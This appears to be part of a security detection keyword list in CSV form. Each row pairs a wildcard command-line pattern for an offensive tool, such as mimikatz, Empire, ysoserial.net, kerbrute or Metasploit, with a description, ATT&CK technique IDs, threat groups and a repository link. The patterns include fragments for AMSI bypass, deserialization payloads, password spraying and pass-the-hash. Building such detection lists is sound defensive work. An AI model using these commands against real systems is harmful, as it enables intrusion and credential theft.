--os-smbrelay*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* --outdir ldapdomaindump *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --output rootDSEs.json --dump*,offensive_tool_keyword,ldapnomnom,Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP),T1110.003 - T1205,TA0001 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/lkarlslund/ldapnomnom,1,1,N/A,N/A,7,697,60,2023-03-31T16:18:14Z,2022-09-18T10:35:09Z -* ovs-agent-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* owa * --user-as-pass *,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -* oxidfind -i *,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,0,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -* oxidfind -n *,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,0,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -* -p * --amsi-bypass *,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -p * -d *.dll -e OpenProcess*,offensive_tool_keyword,ThreadlessInject,Threadless Process Injection using remote function hooking.,T1055.012 - T1055.003 - T1177,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/CCob/ThreadlessInject,1,0,N/A,10,6,552,55,2023-02-23T10:23:56Z,2023-02-05T13:50:15Z -* -p *\mimi.out*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -p 1337:1337 -p 5000:5000*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -* -p 4644 -n mal*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,0,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -* -p 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'*,offensive_tool_keyword,ad-ldap-enum,An LDAP based Active Directory user and group enumeration tool,T1087 - T1087.001 - T1018 - T1069 - T1069.002,TA0007 - TA0003 - TA0004,N/A,N/A,AD Enumeration,https://github.com/CroweCybersecurity/ad-ldap-enum,1,0,blank lmhash,6,3,290,72,2023-02-10T19:07:34Z,2015-08-25T19:38:39Z -* -p ActivatorUrl*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* -p Altserialization*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* -p CommonsCollections1 -c whoami*,offensive_tool_keyword,pysoserial,Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,shell spawning,https://github.com/aStrowxyu/Pysoserial,1,0,N/A,9,1,9,1,2021-12-06T07:41:55Z,2021-11-16T01:55:31Z -* -p DotNetNuke*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* -p LastLogonTimestamp -p LastLogonUserName *,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* -p powershell -i *.ps1 -o *.vba*,offensive_tool_keyword,MaliciousMacroMSBuild,Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.,T1059.001 - T1059.003 - T1127 - T1027.002,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/MaliciousMacroMSBuild,1,0,N/A,8,5,488,117,2019-08-06T08:16:05Z,2018-04-09T23:16:30Z -* -p SessionSecurityTokenHandler*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* -p shellcode -i *.bin -o *.vba*,offensive_tool_keyword,MaliciousMacroMSBuild,Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.,T1059.001 - T1059.003 - T1127 - T1027.002,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/MaliciousMacroMSBuild,1,0,N/A,8,5,488,117,2019-08-06T08:16:05Z,2018-04-09T23:16:30Z -* -p test_passwords.txt*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* -p TransactionManagerReenlist*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*' p::d '*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -* -p:AssemblyName=inveigh*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,0,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -* p2p-conficker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --pacu-help*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -* papacat.ps1*,offensive_tool_keyword,JustEvadeBro,JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.,T1562.001 - T1055.012 - T1218.011,TA0005 - TA0040 - TA0010,N/A,N/A,Defense Evasion,https://github.com/sinfulz/JustEvadeBro,1,0,N/A,8,3,260,25,2023-03-30T06:22:24Z,2021-05-11T06:26:10Z -* parrot main *,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* parrot.run/*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* parrot-backports *,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* parrot-security *,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* password.lst*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* -PasswordList *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-SMBAutoBrute.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* --password-list *,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -* --password-not-required --kdcHost *cme*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* passwordspray -d *,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,0,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -* path-mtu.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -pathToBloodHoundGraph * -pathToOutputGoFetchPath * -pathToAdditionalPayload *,offensive_tool_keyword,GoFetch,GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Exploitation tools - AD Enumeration,https://github.com/GoFetchAD/GoFetch,1,0,N/A,10,7,615,126,2017-06-20T14:15:10Z,2017-04-11T10:45:23Z -* -PathToDMP *.dmp*,offensive_tool_keyword,powerextract,This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process,T1003 - T1055 - T1003.001 - T1055.012,TA0007 - TA0002,N/A,N/A,Credential Access,https://github.com/powerseb/PowerExtract,1,0,N/A,N/A,1,99,14,2023-07-19T14:24:41Z,2021-12-11T15:24:44Z -* -PathToGraph *.json -PathToPayload *.exe*,offensive_tool_keyword,GoFetch,GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Exploitation tools - AD Enumeration,https://github.com/GoFetchAD/GoFetch,1,0,N/A,10,7,615,126,2017-06-20T14:15:10Z,2017-04-11T10:45:23Z -* -Payload * -method sysprep*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -* --payload * --platform windows*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -* -payload *-Lhost *-Lport*,offensive_tool_keyword,empire,Empire scripts arguments. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* payload add *,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,0,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -* --payload CommonsCollections*,offensive_tool_keyword,pysoserial,Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,shell spawning,https://github.com/aStrowxyu/Pysoserial,1,0,N/A,9,1,9,1,2021-12-06T07:41:55Z,2021-11-16T01:55:31Z -* payload start *,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,0,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -* --payload_file * --payload_path*,offensive_tool_keyword,vRealizeLogInsightRCE,POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711),T1190 - T1071 - T1003 - T1069 - T1110 - T1222,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/horizon3ai/vRealizeLogInsightRCE,1,0,Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ,N/A,2,147,24,2023-01-31T11:41:08Z,2023-01-30T22:01:08Z -* --payloadcookie *,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,0,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -* --payload-file pwn.bat*,offensive_tool_keyword,SplunkWhisperer2,Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations,T1068 - T1059.003 - T1071.001,TA0003 - TA0002 - TA0011,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cnotin/SplunkWhisperer2,1,0,N/A,9,3,239,53,2022-09-30T16:41:17Z,2019-02-24T18:05:51Z -* -PayloadPath *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - 